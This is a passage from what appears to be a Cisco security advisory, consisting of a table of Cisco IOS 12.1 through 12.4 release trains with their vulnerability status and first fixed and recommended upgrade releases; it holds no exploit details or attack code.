fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(4)DC2 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.1DC | release | |\r\n| | 12.1(4)DC2 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.1E | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(11)EA1 | |\r\n| | are | |\r\n| 12.1EA | vulnerable, | 12.1(22) |\r\n| | release | EA11 |\r\n| | 12.1(11)EA1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1EB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Note: | |\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(8a)EX | |\r\n| | are | |\r\n| 12.1EX | vulnerable, | |\r\n| | release | |\r\n| | 12.1(8a)EX | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1EY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1EZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1GA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1GB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.1T | first fixed | |\r\n| | 
in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.1XA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(1)XC1 | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.1XC | release | |\r\n| | 12.1(1)XC1 | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.1XD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XN | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XR | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XS | Not | |\r\n| | Vulnerable | 
|\r\n|------------+-------------+-------------|\r\n| 12.1XT | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1XZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Note: | |\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(5)YE1 | |\r\n| | are | 12.4(19a) |\r\n| 12.1YE | vulnerable, | |\r\n| | release | 12.4(19b) |\r\n| | 12.1(5)YE1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1YF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.2-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2 | first fixed | |\r\n| | 
in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2B | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2BC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2BW | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.2(8)BY | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.2BY | release | |\r\n| | 12.2(8)BY | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.2BZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2CX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2CY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2CZ | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.2DA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2DD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2DX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EWA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2FX | Not | |\r\n| | Vulnerable | 
|\r\n|------------+-------------+-------------|\r\n| 12.2FY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2FZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2JA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2JK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2MB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2MC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2S | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SBC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SCA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SED | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEE | Not | |\r\n| | Vulnerable | 
|\r\n|------------+-------------+-------------|\r\n| 12.2SEF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SGA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SRA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SRB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SRC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SVA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SVC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SVD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXF | Not | |\r\n| | Vulnerable | 
|\r\n|------------+-------------+-------------|\r\n| 12.2SXH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2T | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.2(8) | |\r\n| | TPC10d are | |\r\n| | vulnerable, | |\r\n| 12.2TPC | release | |\r\n| | 12.2(8) | |\r\n| | TPC10d and | |\r\n| | later are | |\r\n| | not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.2UZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XB | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XC | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XG | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 
12.2XK | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XL | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XN | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XNA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XR | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XS | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XT | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XU | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YH | Not | |\r\n| | Vulnerable | 
|\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YJ | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2YK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YL | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YM | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YN | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.2(18) |\r\n| | migrate to | SXF15; |\r\n| 12.2YO | any release | Available |\r\n| | in 12.2SY | on |\r\n| | | 08-AUG-08 |\r\n|------------+-------------+-------------|\r\n| 12.2YP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YR | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YS | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YT | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YU | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YV | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2YW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YZ | Not | |\r\n| | Vulnerable | 
|\r\n|------------+-------------+-------------|\r\n| 12.2ZA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZB | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2ZC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZD | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZE | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZF | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.2ZG | first fixed | |\r\n| | in 12.4T | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.2ZH | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZJ | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.2ZL | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.2ZP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZYA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.3-Based | Release | 
Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3 | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3B | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3BC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3BW | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3EU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JEA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JEB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JEC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3T | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3TPC | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.3VA | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XA | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XB | first fixed | |\r\n| | in 12.4 | 12.4(19b) 
|\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XC | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XD | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XE | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XF | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XG | first fixed | |\r\n| | in 12.4T | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XH | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3XI | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | | 12.3(14) |\r\n| | | YX12 |\r\n| | Vulnerable; | |\r\n| 12.3XJ | first fixed | 12.4(20)T; |\r\n| | in 12.3YX | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XK | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XQ | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XR | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 
12.3XS | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3XU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | | 12.3(14) |\r\n| | | YX12 |\r\n| | Vulnerable; | |\r\n| 12.3XW | first fixed | 12.4(20)T; |\r\n| | in 12.3YX | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.3XY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3YA | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YD | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | | 12.3(14) |\r\n| | | YX12 |\r\n| | Vulnerable; | |\r\n| 12.3YF | first fixed | 12.4(20)T; |\r\n| | in 12.3YX | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YG | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YH | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YI | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.3YJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YK | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.3(14) | |\r\n| | YM12 are | |\r\n| | vulnerable, | 12.3(14) |\r\n| 12.3YM | release | YM12 |\r\n| | 12.3(14) 
| |\r\n| | YM12 and | |\r\n| | later are | |\r\n| | not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.3YQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YS | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YT | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | |\r\n| 12.3YU | first fixed | |\r\n| | in 12.4XB | |\r\n|------------+-------------+-------------|\r\n| 12.3YX | 12.3(14) | 12.3(14) |\r\n| | YX12 | YX12 |\r\n|------------+-------------+-------------|\r\n| 12.3YZ | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.4-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | 12.4(18b) | |\r\n| | | |\r\n| | 12.4(19a) | 12.4(19a) |\r\n| 12.4 | | |\r\n| | 12.4(19b) | 12.4(19b) |\r\n| | | |\r\n| | 12.4(21) | |\r\n|------------+-------------+-------------|\r\n| 12.4JA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JMA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JMB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JMC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4MD | 12.4(15)MD | 